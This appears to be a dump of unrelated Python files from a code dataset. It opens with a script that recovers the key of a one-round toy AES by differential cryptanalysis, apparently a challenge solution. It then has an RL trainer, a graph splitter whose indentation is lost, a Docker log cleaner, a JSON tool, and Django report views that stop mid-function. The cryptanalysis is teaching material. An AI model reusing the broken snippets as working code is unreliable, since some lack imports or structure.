sbox = [0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x1, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76, 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15, 0x4, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x5, 0x9a, 0x7, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75, 0x9, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84, 0x53, 0xd1, 0x0, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf, 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x2, 0x7f, 0x50, 0x3c, 0x9f, 0xa8, 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2, 0xcd, 0xc, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73, 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0xb, 0xdb, 0xe0, 0x32, 0x3a, 0xa, 0x49, 0x6, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79, 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x8, 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a, 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x3, 0xf6, 0xe, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e, 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf, 0x8c, 0xa1, 0x89, 0xd, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0xf, 0xb0, 0x54, 0xbb, 0x16]
# Inverse shift rows to deduce key positions
# (maps a post-ShiftRows index back to its original state position)
invShiftRows = [0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12, 1, 6, 11]
# ShiftRows function for the plaintexts
def ShiftRows(state):
    """Apply the AES ShiftRows step to a flat 16-byte state.

    Row r of the 4x4 column-major state is rotated left by r positions;
    expressed here as one index permutation over the flat layout.
    Returns a new ``bytes`` object; *state* is not modified.
    """
    permutation = (0, 5, 10, 15,   # row 0: no shift
                   4, 9, 14, 3,    # row 1: shift left 1
                   8, 13, 2, 7,    # row 2: shift left 2
                   12, 1, 6, 11)   # row 3: shift left 3
    return bytes(state[src] for src in permutation)
def getKey(number, possibles):
    """Derive one candidate master key from *number* (0 .. 2**16 - 1).

    Bit i of *number* selects which of the two candidate bytes stored in
    ``possibles[i]`` goes into key position i.

    Bug fix: the parameter was misspelled ``posssibles``, so the body's
    reference to ``possibles`` silently resolved to the module-level
    global and the argument was ignored.
    """
    key = [-1] * 16
    for i in range(0, 16):
        # assumes every position holds exactly two candidates (a 2-tuple)
        # — TODO confirm against how ``possibles`` is populated
        key[i] = possibles[i][number % 2]
        number >>= 1
    return bytes(key)
def getRoundKey(key):
    """Expand a 16-byte AES-128 master key into the first round key.

    Implements one step of the AES key schedule: the first word is
    W0 ^ SubWord(RotWord(W3)) ^ Rcon1, and each following word is the
    corresponding master-key word xored with the previous round-key word.
    """
    roundKey = [-1] * 16
    # First column (W4): rotate the last key word, substitute through the
    # s-box, and add the round-1 constant (0x01) to the top byte.
    rotated_last_word = (key[13], key[14], key[15], key[12])
    for row in range(4):
        roundKey[row] = key[row] ^ sbox[rotated_last_word[row]]
    roundKey[0] ^= 1
    # Remaining columns (W5..W7): key byte xor the byte four positions back.
    for pos in range(4, 16):
        roundKey[pos] = key[pos] ^ roundKey[pos - 4]
    return bytes(roundKey)
def encrypt(input, key):
    """One-round toy AES: AddRoundKey(master), SubBytes, AddRoundKey(round 1).

    ShiftRows is applied to the *key* here (and to the plaintexts by the
    caller) rather than to the state, which is equivalent for this
    byte-wise analysis. Returns the 16-byte ciphertext.
    """
    roundKey = getRoundKey(key)
    shifted_key = ShiftRows(key)
    state = list(input)
    for pos in range(0, 16):
        mixed = state[pos] ^ shifted_key[pos]       # AddRoundKey (master key)
        state[pos] = sbox[mixed] ^ roundKey[pos]    # SubBytes + AddRoundKey (round key)
    return bytes(state)
# Differential attack driver: recover the key from two known
# plaintext/ciphertext pairs of the one-round cipher above.

# Load in the two plaintexts and apply ShiftRows
p1 = ShiftRows(b"the economy of m")
p2 = ShiftRows(b"achinery and man")
# Load in the two ciphertexts
c1 = binascii.unhexlify("0c9e246cb8a1bfa3b0e947a1a94c8d11")
c2 = binascii.unhexlify("998fffc15bd9cf74804d59fc23cb6e59")
# Find key values for each position
possibles = [None]*16
for i in range(0, 16):
    # Calculate E(x) ^ E(x')
    # (round-key contributions cancel in the xor of the two ciphertexts)
    expected = c1[i] ^ c2[i]
    # Brute force values of s(x ^ k) ^ s(x' ^ k)
    for k in range(0, 256):
        result = sbox[p1[i] ^ k] ^ \
                 sbox[p2[i] ^ k]
        if result == expected:
            # Find real position of key by reversing ShiftRows
            pos = invShiftRows[i]
            print("Key byte for pos " + str(pos) + ":", hex(k), chr(k))
            # Store the possible key value
            # NOTE(review): `== None` should idiomatically be `is None`;
            # also, if a position ever yields more than two candidates the
            # tuple nests ((a, b), c), which getKey cannot index — confirm
            # the differential always gives exactly two candidates here.
            if possibles[pos] == None:
                possibles[pos] = k
            else:
                possibles[pos] = (possibles[pos], k)
# Brute force the 2^16 possibilities
# (one bit per key position chooses between the two surviving candidates)
print("")
print("Searching keys...")
print("==================")
for i in range(0, 2**16):
    key = getKey(i, possibles)
    if c1 == encrypt(p1, key) and c2 == encrypt(p2, key):
        print("Key is", key.hex(), "(" + str(key) + ")")
|
15,649 | 67ca383fcac79f185792fa827f3bf50b1ef17dae | import argparse
import time
import datetime
import torch_ac
import tensorboardX
import sys
import utils
from utils import device
from model import ACModel
# Parse arguments
# Command-line interface for the RL training script: algorithm selection,
# environment, logging cadence, and algorithm hyperparameters.
parser = argparse.ArgumentParser()

# General parameters
parser.add_argument("--algo", required=True,
                    help="algorithm to use: a2c | ppo (REQUIRED)")
parser.add_argument("--env", required=True,
                    help="name of the environment to train on (REQUIRED)")
parser.add_argument("--model", default=None,
                    help="name of the model (default: {ENV}_{ALGO}_{TIME})")
parser.add_argument("--seed", type=int, default=1,
                    help="random seed (default: 1)")
parser.add_argument("--log-interval", type=int, default=1,
                    help="number of updates between two logs (default: 1)")
parser.add_argument("--save-interval", type=int, default=10,
                    help="number of updates between two saves (default: 10, 0 means no saving)")
parser.add_argument("--procs", type=int, default=16,
                    help="number of processes (default: 16)")
parser.add_argument("--frames", type=int, default=10**7,
                    help="number of frames of training (default: 1e7)")

# Parameters for main algorithm
parser.add_argument("--epochs", type=int, default=4,
                    help="number of epochs for PPO (default: 4)")
parser.add_argument("--batch-size", type=int, default=256,
                    help="batch size for PPO (default: 256)")
parser.add_argument("--frames-per-proc", type=int, default=None,
                    help="number of frames per process before update (default: 5 for A2C and 128 for PPO)")
parser.add_argument("--discount", type=float, default=0.99,
                    help="discount factor (default: 0.99)")
parser.add_argument("--lr", type=float, default=0.001,
                    help="learning rate (default: 0.001)")
parser.add_argument("--gae-lambda", type=float, default=0.95,
                    help="lambda coefficient in GAE formula (default: 0.95, 1 means no gae)")
parser.add_argument("--entropy-coef", type=float, default=0.01,
                    help="entropy term coefficient (default: 0.01)")
parser.add_argument("--value-loss-coef", type=float, default=0.5,
                    help="value loss term coefficient (default: 0.5)")
parser.add_argument("--max-grad-norm", type=float, default=0.5,
                    help="maximum norm of gradient (default: 0.5)")
parser.add_argument("--optim-eps", type=float, default=1e-8,
                    help="Adam and RMSprop optimizer epsilon (default: 1e-8)")
parser.add_argument("--optim-alpha", type=float, default=0.99,
                    help="RMSprop optimizer alpha (default: 0.99)")
parser.add_argument("--clip-eps", type=float, default=0.2,
                    help="clipping epsilon for PPO (default: 0.2)")
parser.add_argument("--recurrence", type=int, default=1,
                    help="number of time-steps gradient is backpropagated (default: 1). If > 1, a LSTM is added to the model to have memory.")
parser.add_argument("--text", action="store_true", default=False,
                    help="add a GRU to the model to handle text input")
if __name__ == "__main__":
    args = parser.parse_args()

    # Recurrence > 1 implies the model needs memory (an LSTM is added).
    args.mem = args.recurrence > 1

    # Set run dir
    date = datetime.datetime.now().strftime("%y-%m-%d-%H-%M-%S")
    default_model_name = f"{args.env}_{args.algo}_seed{args.seed}_{date}"

    model_name = args.model or default_model_name
    model_dir = utils.get_model_dir(model_name)

    # Load loggers and Tensorboard writer
    txt_logger = utils.get_txt_logger(model_dir)
    csv_file, csv_logger = utils.get_csv_logger(model_dir)
    tb_writer = tensorboardX.SummaryWriter(model_dir)

    # Log command and all script arguments
    txt_logger.info("{}\n".format(" ".join(sys.argv)))
    txt_logger.info("{}\n".format(args))

    # Set seed for all randomness sources
    utils.seed(args.seed)

    # Set device
    txt_logger.info(f"Device: {device}\n")

    # Load environments
    envs = []
    for i in range(args.procs):
        # Distinct seed per process so parallel environments diverge.
        envs.append(utils.make_env(args.env, args.seed + 10000 * i))
    txt_logger.info("Environments loaded\n")

    # Load training status (resume support); start fresh if none exists.
    try:
        status = utils.get_status(model_dir)
    except OSError:
        status = {"num_frames": 0, "update": 0}
    txt_logger.info("Training status loaded\n")

    # Load observations preprocessor
    obs_space, preprocess_obss = utils.get_obss_preprocessor(envs[0].observation_space)
    if "vocab" in status:
        preprocess_obss.vocab.load_vocab(status["vocab"])
    txt_logger.info("Observations preprocessor loaded")

    # Load model (and restore weights when resuming)
    acmodel = ACModel(obs_space, envs[0].action_space, args.mem, args.text)
    if "model_state" in status:
        acmodel.load_state_dict(status["model_state"])
    acmodel.to(device)
    txt_logger.info("Model loaded\n")
    txt_logger.info("{}\n".format(acmodel))

    # Load algo
    if args.algo == "a2c":
        algo = torch_ac.A2CAlgo(envs, acmodel, device, args.frames_per_proc, args.discount, args.lr, args.gae_lambda,
                                args.entropy_coef, args.value_loss_coef, args.max_grad_norm, args.recurrence,
                                args.optim_alpha, args.optim_eps, preprocess_obss)
    elif args.algo == "ppo":
        algo = torch_ac.PPOAlgo(envs, acmodel, device, args.frames_per_proc, args.discount, args.lr, args.gae_lambda,
                                args.entropy_coef, args.value_loss_coef, args.max_grad_norm, args.recurrence,
                                args.optim_eps, args.clip_eps, args.epochs, args.batch_size, preprocess_obss)
    else:
        raise ValueError("Incorrect algorithm name: {}".format(args.algo))

    if "optimizer_state" in status:
        algo.optimizer.load_state_dict(status["optimizer_state"])
    txt_logger.info("Optimizer loaded\n")

    # Train model
    num_frames = status["num_frames"]
    update = status["update"]
    start_time = time.time()

    while num_frames < args.frames:
        # Update model parameters
        update_start_time = time.time()
        exps, logs1 = algo.collect_experiences()
        logs2 = algo.update_parameters(exps)
        logs = {**logs1, **logs2}
        update_end_time = time.time()

        num_frames += logs["num_frames"]
        update += 1

        # Print logs
        if update % args.log_interval == 0:
            # FPS is measured over this update only, not a running average.
            fps = logs["num_frames"] / (update_end_time - update_start_time)
            duration = int(time.time() - start_time)
            return_per_episode = utils.synthesize(logs["return_per_episode"])
            rreturn_per_episode = utils.synthesize(logs["reshaped_return_per_episode"])
            num_frames_per_episode = utils.synthesize(logs["num_frames_per_episode"])

            header = ["update", "frames", "FPS", "duration"]
            data = [update, num_frames, fps, duration]
            header += ["rreturn_" + key for key in rreturn_per_episode.keys()]
            data += rreturn_per_episode.values()
            header += ["num_frames_" + key for key in num_frames_per_episode.keys()]
            data += num_frames_per_episode.values()
            header += ["entropy", "value", "policy_loss", "value_loss", "grad_norm"]
            data += [logs["entropy"], logs["value"], logs["policy_loss"], logs["value_loss"], logs["grad_norm"]]

            txt_logger.info(
                "U {} | F {:06} | FPS {:04.0f} | D {} | rR:μσmM {:.2f} {:.2f} {:.2f} {:.2f} | F:μσmM {:.1f} {:.1f} {} {} | H {:.3f} | V {:.3f} | pL {:.3f} | vL {:.3f} | ∇ {:.3f}"
                .format(*data))

            # Plain (unreshaped) returns are logged to CSV/TB but not to the
            # console line above.
            header += ["return_" + key for key in return_per_episode.keys()]
            data += return_per_episode.values()

            # Write the CSV header only at the very start of a fresh run.
            if status["num_frames"] == 0:
                csv_logger.writerow(header)
            csv_logger.writerow(data)
            csv_file.flush()

            for field, value in zip(header, data):
                tb_writer.add_scalar(field, value, num_frames)

        # Save status
        if args.save_interval > 0 and update % args.save_interval == 0:
            status = {"num_frames": num_frames, "update": update,
                      "model_state": acmodel.state_dict(), "optimizer_state": algo.optimizer.state_dict()}
            if hasattr(preprocess_obss, "vocab"):
                status["vocab"] = preprocess_obss.vocab.vocab
            utils.save_status(status, model_dir)
            txt_logger.info("Status saved")
|
15,650 | b0c67052b7d932ac733ad12aa02af93fe2283976 | import networkx as nx
import os
from split_train_test import *
def read_graph(weighted=0, input=None, directed=0):
    """Load a space-delimited edge list into a networkx graph.

    ``weighted`` and ``directed`` are 0/1 flags. Unweighted edge lists get
    a uniform weight of 1 on every edge. The graph is converted to
    undirected unless ``directed`` is set.
    """
    if weighted:
        graph = nx.read_edgelist(input, nodetype=int, data=(('weight', float),),
                                 create_using=nx.DiGraph(), delimiter=' ')
    else:
        graph = nx.read_edgelist(input, nodetype=int, create_using=nx.DiGraph(),
                                 delimiter=' ')
        for u, v in graph.edges():
            graph[u][v]['weight'] = 1
    return graph if directed else graph.to_undirected()
if __name__ == '__main__':
"node_id 从1开始;写入的train和test文件也是从1开始"
dataset_dir = 'D:\hybridrec\dataset\preprocessing_code//' # 改这里
split_dir = 'D:\hybridrec\dataset\split_train_test\preprocessing_code//' # 改这里
train_frac = 0.6
dataset_files = os.listdir(dataset_dir)
for fi in dataset_files:
fi_d = os.path.join(dataset_dir, fi)
if os.path.isdir(fi_d) & \
((fi == 'ca-hepph') or (fi == 'facebook_combined') or (fi == 'yeast')or (fi == 'email-eucore')
# or (fi == 'petster-friendships-hamster') or (fi == 'wiki')
# or (fi == 'usa-airports') or (fi == 'pubmed') or (fi == 'digg_reply')
# or (fi == 'ego-gplus') or (fi == 'enron') or (fi == 'epinions')
): # & (fi == 'router') 在test_ratio = 0.2不可以完全联通地划分
print("dealing: "+str(fi))
# 读
fileName = str(fi) + '_undirected_1_giantCom.edgelist'
filePath = os.path.join(fi_d, fileName)
G = read_graph(weighted=0, input=filePath, directed=0)
# print("G:" + str(len(G)))
# # print("G.edgesNum:" + str(len(G.edges())))
train_E, test_E = split_train_test(G, train_frac=train_frac)
G_train = G
G_train.remove_edges_from(test_E)
# print("G_train:" + str(len(G_train)))
# print("G_train.edgesNum:" + str(len(G_train.edges())))
############################## directed nodeid from 1 ###############################
# 写
write_dir_name = os.path.join(split_dir, fi)
train_write_file_name = 'train_' + fi+'_directed_1_giantCom.edgelist'
train_write_path = os.path.join(write_dir_name, train_write_file_name)
test_write_file_name = 'test_' + fi + '_directed_1_giantCom.edgelist'
test_write_path = os.path.join(write_dir_name, test_write_file_name)
if not os.path.exists(write_dir_name):
os.makedirs(write_dir_name)
# nx.write_edgelist(G_train, train_write_path, data=False)
with open(train_write_path, 'w+') as f:
for edge in sorted(train_E):
f.write(str(edge[0])+' ' + str(edge[1]) + '\n')
f.close()
with open(test_write_path, 'w+') as f:
for edge in sorted(test_E):
f.write(str(edge[0])+' ' + str(edge[1]) + '\n')
f.close()
############################## undirected nodeid from 1 ###############################
# 写
write_dir_name = os.path.join(split_dir, fi)
train_write_file_name = 'train_' + fi+'_undirected_1_giantCom.edgelist'
train_write_path = os.path.join(write_dir_name, train_write_file_name)
test_write_file_name = 'test_' + fi + '_undirected_1_giantCom.edgelist'
test_write_path = os.path.join(write_dir_name, test_write_file_name)
if not os.path.exists(write_dir_name):
os.makedirs(write_dir_name)
# nx.write_edgelist(G_train, train_write_path, data=False)
with open(train_write_path, 'w+') as f:
for edge in sorted(train_E):
f.write(str(edge[0])+' ' + str(edge[1]) + '\n')
f.write(str(edge[1]) + ' ' + str(edge[0]) + '\n')
f.close()
with open(test_write_path, 'w+') as f:
for edge in sorted(test_E):
f.write(str(edge[0])+' ' + str(edge[1]) + '\n')
f.write(str(edge[1]) + ' ' + str(edge[0]) + '\n')
f.close()
############################## directed nodeid from 0 ###############################
# 写
write_dir_name = os.path.join(split_dir, fi)
train_write_file_name = 'train_' + fi+'_directed_0_giantCom.edgelist'
train_write_path = os.path.join(write_dir_name, train_write_file_name)
test_write_file_name = 'test_' + fi + '_directed_0_giantCom.edgelist'
test_write_path = os.path.join(write_dir_name, test_write_file_name)
if not os.path.exists(write_dir_name):
os.makedirs(write_dir_name)
# nx.write_edgelist(G_train, train_write_path, data=False)
with open(train_write_path, 'w+') as f:
for edge in sorted(train_E):
f.write(str(edge[0]-1)+' ' + str(edge[1]-1) + '\n')
f.close()
with open(test_write_path, 'w+') as f:
for edge in sorted(test_E):
f.write(str(edge[0]-1)+' ' + str(edge[1]-1) + '\n')
f.close()
############################## undirected nodeid from 0 ###############################
# 写
write_dir_name = os.path.join(split_dir, fi)
train_write_file_name = 'train_' + fi+'_undirected_0_giantCom.edgelist'
train_write_path = os.path.join(write_dir_name, train_write_file_name)
test_write_file_name = 'test_' + fi + '_undirected_0_giantCom.edgelist'
test_write_path = os.path.join(write_dir_name, test_write_file_name)
if not os.path.exists(write_dir_name):
os.makedirs(write_dir_name)
# nx.write_edgelist(G_train, train_write_path, data=False)
with open(train_write_path, 'w+') as f:
for edge in sorted(train_E):
f.write(str(edge[0]-1)+' ' + str(edge[1]-1) + '\n')
f.write(str(edge[1]-1) + ' ' + str(edge[0]-1) + '\n')
f.close()
with open(test_write_path, 'w+') as f:
for edge in sorted(test_E):
f.write(str(edge[0]-1)+' ' + str(edge[1]-1) + '\n')
f.write(str(edge[1]-1) + ' ' + str(edge[0]-1) + '\n')
f.close()
pass
pass
# 下面丢弃,仅仅作为参考
# # 读入数据集
# print("----Reading graph......")
# G = read_graph(weighted=0, input=filePath, directed=0)
# nx.write_edgelist(G, 'output/Graph.txt', data=False)
# print(len(G))
# print(len(G.edges()))
#
# # 划分数据集
# train_E, test_E = split_train_test(G, train_frac=0.9)
# G.remove_edges_from(test_E)
# print("G_giantCom :" + str(nx.is_connected(G)))
# nx.write_edgelist(G, 'output/Graph_train.txt', data=False)
# print(len(G))
# print(len(G.edges()))
#
# # 验证最大联通子图
# G_simple = max(nx.connected_component_subgraphs(G), key=len)
# nx.write_edgelist(G_simple, 'output/Graph_train_simple.txt', data=False)
# print(len(G_simple))
# print(len(G_simple.edges()))
pass
|
15,651 | 9b09d3a443e3fcebbfa916522c6350ba03a0462f | #!/usr/bin/env python3
#This is used to keep track of the size of the streetmechant01 container (log) size
import docker
import os
import logging
# Watchdog: find the streetmerchant container, record its json log size,
# and truncate the log when it exceeds MAX_LOG_SIZE megabytes.
SCRIPT_LOG = '/var/log/SCRIPT_LOG.log'
IMAGE_NAME = 'ghcr.io/jef/streetmerchant:nightly'
MAX_LOG_SIZE = 300  # megabytes
client = docker.from_env()
all_containers = client.containers.list()
#find the given image
for i in all_containers:
    config_dir = i.attrs.get("Config")
    loaded_image = config_dir['Image']
    if loaded_image == IMAGE_NAME:
        # LogPath points at the container's json-file log on the host;
        # presumably this script runs with permissions to read/truncate it
        # — TODO confirm.
        log_path = i.attrs.get("LogPath")
        dir_size = os.path.getsize(log_path)
        dir_size_mb = round(dir_size / 1024 / 1024, 3)
        #Create log file to keep track of size
        # (basicConfig is a no-op after the first matching container)
        logging.basicConfig(filename=SCRIPT_LOG, filemode='a', format='%(asctime)s: %(levelname)s - %(message)s', level=logging.DEBUG)
        log_msg = "Log size: %sMb" % (dir_size_mb)
        logging.info(log_msg)
        #Clean out log if size exceeds determined max
        if dir_size_mb > MAX_LOG_SIZE:
            # Opening for write truncates the container log in place.
            file = open(log_path,"w")
            file.close()
            print("Log file has been terminated")
            logging.warning("Log has been deleted")
|
15,652 | eb407828fbc08a69297dcaf8a7443281e857d040 | import requests
import json
class jsonParser:
    """Parses a keyword-definition JSON file and a local database JSON
    file, and supports attribute-based lookups over database entries.

    The keywords file has the shape ``{"SearchTerms": [{term: [values]}]}``
    and the database maps a file name to ``[{term: value, ...}]``.
    """

    # Kept for backward compatibility with code reading them off the
    # class; real state is per-instance (set in __init__).
    searchTermDict = {}
    searchTermList = []
    fileList = []

    def __init__(self, keywordsJSON, localDatabaseJSON, debugMode):
        """Load both JSON files and index the declared search terms.

        Bug fix: searchTermDict / searchTermList / fileList were mutable
        class-level attributes, so every instance shared and kept
        appending to the same objects; they are now fresh per instance.
        """
        self.searchTermDict = {}
        self.searchTermList = []
        self.fileList = []
        with open(keywordsJSON) as objectAttributes:
            self.data = json.load(objectAttributes)
        with open(localDatabaseJSON) as localDatabase:
            self.databaseInfo = json.load(localDatabase)
        for term in self.data["SearchTerms"][0]:
            values = self.data["SearchTerms"][0][term]
            self.searchTermList.append(term)
            self.searchTermDict[term] = list(values)
        if debugMode is True:
            print(self.searchTermDict)

    def showParsed(self):
        """Print every (file, term) value; warn on terms missing from an
        entry instead of crashing."""
        for fileName in self.databaseInfo:
            for term in self.searchTermList:
                try:
                    print("Parsing " + fileName + " " + term + ": " + self.databaseInfo[fileName][0][term])
                except KeyError:
                    print("Key " + term + " does not exist. please check composition of fileAttributes.json")

    def printSearchTerms(self):
        """Print the list of known search terms."""
        print(self.searchTermList)

    def findWithAtrributes(self, attributeList):
        """Return database entries whose values match ALL attribute dicts
        in *attributeList*.

        (The method name keeps its historical spelling for caller
        compatibility.)
        """
        candidates = dict(self.databaseInfo)
        survivors = dict(self.databaseInfo)
        # Warn about unknown terms up front (lookup still proceeds).
        for attributes in attributeList:
            for term in attributes.keys():
                if term not in self.searchTermList:
                    print("You searched for a term that was not in the term list.")
                    break
        for fileName in candidates.keys():       # every candidate file
            for attributes in attributeList:     # every requested filter
                for term in attributes.keys():
                    if attributes[term] != candidates[fileName][0][term]:
                        # Drop the entry on the first mismatching value.
                        if fileName in survivors:
                            del survivors[fileName]
        return survivors

    def scrapeKeys(self, fwaObject):
        """Return the keys of *fwaObject* as a list."""
        return list(fwaObject.keys())
class jsonWriter:
    """Read/write companion of jsonParser: loads the same keyword and
    database JSON files and can interactively append new entries to the
    database file.

    NOTE(review): the class-level mutable attributes below are shared by
    every instance (each __init__ keeps appending to them) — confirm this
    is intended.
    """

    searchTermDict = {}
    searchTermList = []
    fileList = []
    databasePath = ""
    readingPath = ""

    def __init__(self, keywordsJSON, localDatabaseJSON, debugMode):
        # Load keyword definitions and the database, remembering both
        # paths for later writes.
        with open(keywordsJSON) as objectAttributes:
            self.data = json.load(objectAttributes)
        self.readingPath = keywordsJSON
        with open(localDatabaseJSON) as localDatabase:
            self.databaseInfo = json.load(localDatabase)
        self.databasePath = localDatabaseJSON
        for i in self.data["SearchTerms"][0]:
            j = self.data["SearchTerms"][0][i]
            self.searchTermDict[i] = []
            self.searchTermList.append(i)
            for z in j:
                self.searchTermDict[i].append(z)
        if debugMode is True:
            print(self.searchTermDict)

    def showKeys(self):
        """Print the list of known search terms."""
        print(self.searchTermList)

    def showParsed(self):
        """Print every (file, term) value in the loaded database."""
        for i in self.databaseInfo:
            for j in self.searchTermList:
                try:
                    print("Parsing " + i + " " + j + ": " + self.databaseInfo[i][0][j])
                except KeyError:
                    print("Key " + j + " does not exist. please check composition of fileAttributes.json")

    def addData(self, additionalData):
        """Interactively prompt for each search term and append a new
        entry named *additionalData* to the database JSON file.

        NOTE(review): this edits the JSON file textually — it appends the
        dumped entry with its surrounding braces stripped, then rewrites
        the file moving the last line to the top after '{'. It assumes a
        very specific line layout of the existing file and can corrupt it
        otherwise — verify before reuse.
        """
        #stolen from http://stackoverflow.com/questions/15415709/update-json-file
        innerTempDict = {}
        print("Entering data for: " + additionalData)
        for i in self.searchTermList:
            print("Data: " + i)
            temp = input()
            innerTempDict[i] = temp
        tempDict = {}
        tempDict[additionalData] = [innerTempDict]
        with open(self.databasePath, "a") as json_file:
            json_file.write("{}\n".format(json.dumps(tempDict))[1:-1])
        f = open(self.databasePath, "r")
        contents = f.readlines()
        f.close()
        # Move the (just appended) last line to the front, after '{'.
        contents.insert(0, "{\n" + contents[len(contents) - 1])
        contents.pop()
        f = open(self.databasePath, "w")
        contents = "".join(contents)
        f.write(contents)
        f.close()
# Script entry: interactively append one record to fileAttributes.json.
print("Pre Implementation of JSON management tools for Szism")
print("By: Austin Fell")
dataAddition = jsonWriter("keywords.json", "fileAttributes.json", False)
dataAddition.addData("StartBootstrap-Yomother")
|
15,653 | acb5b4319eccf15169b8746c6e102977a8d9c7b2 | cars = ["Ford", "Volvo", "BMW"]
print(cars)
x = len(cars)
|
15,654 | edf273a1d5c769abc5ab7313187f9299ee06d045 | from django.shortcuts import render
from django.http import HttpResponse
from django.views.generic import View
from django.http import JsonResponse
from django import forms
from django.views.decorators.csrf import csrf_exempt
from django.utils.decorators import method_decorator
from django.db import connection
from report.models import *
import json
# Create your views here.
def index(request):
    """Render the report landing page."""
    return render(request, 'report/base_report.html')
def ReportListAllInvoices(request):
    """Render every invoice joined with its customer and line items."""
    with connection.cursor() as cursor:
        # Raw SQL; the quoted aliases become the report column headers.
        cursor.execute('SELECT i.invoice_no as "Invoice No", i.date as "Date" '
                       ' , i.customer_code as "Customer Code", c.name as "Customer Name" '
                       ' , i.due_date as "Due Date", i.total as "Total", i.vat as "VAT", i.amount_due as "Amount Due" '
                       ' , ili.product_code as "Product Code", p.name as "Product Name" '
                       ' , ili.quantity as "Quantity", ili.unit_price as "Unit Price", ili.extended_price as "Extended Price" '
                       ' FROM invoice i JOIN customer c ON i.customer_code = c.customer_code '
                       ' JOIN invoice_line_item ili ON i.invoice_no = ili.invoice_no '
                       ' JOIN product p ON ili.product_code = p.code ')
        row = dictfetchall(cursor)
        column_name = [col[0] for col in cursor.description]
        data_report = dict()
        data_report['data'] = row
        data_report['column_name'] = column_name
        return render(request, 'report/report_list_all_invoices.html', data_report)
def ReportProductsSold(request):
    """Render total quantity and value sold, aggregated per product."""
    with connection.cursor() as cursor:
        cursor.execute('SELECT ili.product_code as "Product Code", p.name as "Product Name" '
                       ' , SUM(ili.quantity) as "Total Quantity Sold", SUM(ili.extended_price) as "Total Value Sold" '
                       ' FROM invoice i JOIN invoice_line_item ili ON i.invoice_no = ili.invoice_no '
                       ' JOIN product p ON ili.product_code = p.code '
                       ' GROUP BY p.code, ili.product_code, p.name ')
        row = dictfetchall(cursor)
        column_name = [col[0] for col in cursor.description]
        data_report = dict()
        data_report['data'] = row
        data_report['column_name'] = column_name
        return render(request, 'report/report_products_sold.html', data_report)
def ReportListAllProducts(request):
    """Render the full product catalogue (code, name, units)."""
    with connection.cursor() as cursor:
        cursor.execute('SELECT code as "Code", name as "Name", units as "Units" FROM product ')
        report_rows = dictfetchall(cursor)
        headers = [col[0] for col in cursor.description]
        context = {'data': report_rows, 'column_name': headers}
        return render(request, 'report/report_list_all_products.html', context)
def dictfetchall(cursor):
    """Return all rows from a cursor as a list of dicts.

    Keys are the column names lower-cased with spaces replaced by
    underscores, so SQL aliases like "Invoice No" become 'invoice_no'.
    """
    keys = [col[0].replace(" ", "_").lower() for col in cursor.description]
    rows = []
    for values in cursor.fetchall():
        rows.append(dict(zip(keys, values)))
    return rows
def CursorToDict(data, columns):
    """Convert raw rows plus their column names into a list of dicts.

    Column names are normalized the same way as in dictfetchall
    (lower-cased, spaces replaced by underscores).
    """
    fieldnames = [name.replace(" ", "_").lower() for name in columns]
    return [dict(zip(fieldnames, row)) for row in data]
def ReportListAllReceipt(request):
    """Render every receipt joined with its customer, line items and the
    invoices the payments apply to."""
    with connection.cursor() as cursor:
        cursor.execute('SELECT r.receipt_no as "Receipt No", r.date as "Receipt Date" '
                       ' , r.customer_code as "Customer Code", r.payment_code as "Payment Method" '
                       ' , r.payment_ref as "Payment Reference", r.remark as "Remarks" '
                       ' , r.total_received as "Total Received", c.name as "Customer Name" '
                       ' , rli.invoice_no as "Invoice No", rli.amount_paid_here as "Amount Paid Here" '
                       ' , i.date as "Invoice Date" '
                       ' FROM receipt r JOIN customer c ON r.customer_code = c.customer_code '
                       ' Join receipt_line_item rli ON r.receipt_no = rli.receipt_no'
                       ' Join invoice i ON rli.invoice_no = i.invoice_no')
        row = dictfetchall(cursor)
        column_name = [col[0] for col in cursor.description]
        data_report = dict()
        data_report['data'] = row
        data_report['column_name'] = column_name
        return render(request, 'report/report_list_all_receipt.html', data_report)
def ReportUnpaidInvoice(request):
    """Render per-invoice outstanding balances plus summary totals.

    First query: every invoice that has at least one receipt line, with
    amount due, amount received and the difference. Second query: total
    outstanding amount and count of not-fully-paid invoices.

    NOTE(review): invoices with no receipt lines at all are excluded by
    the inner join — confirm that is the intended definition of "unpaid".
    """
    with connection.cursor() as cursor:
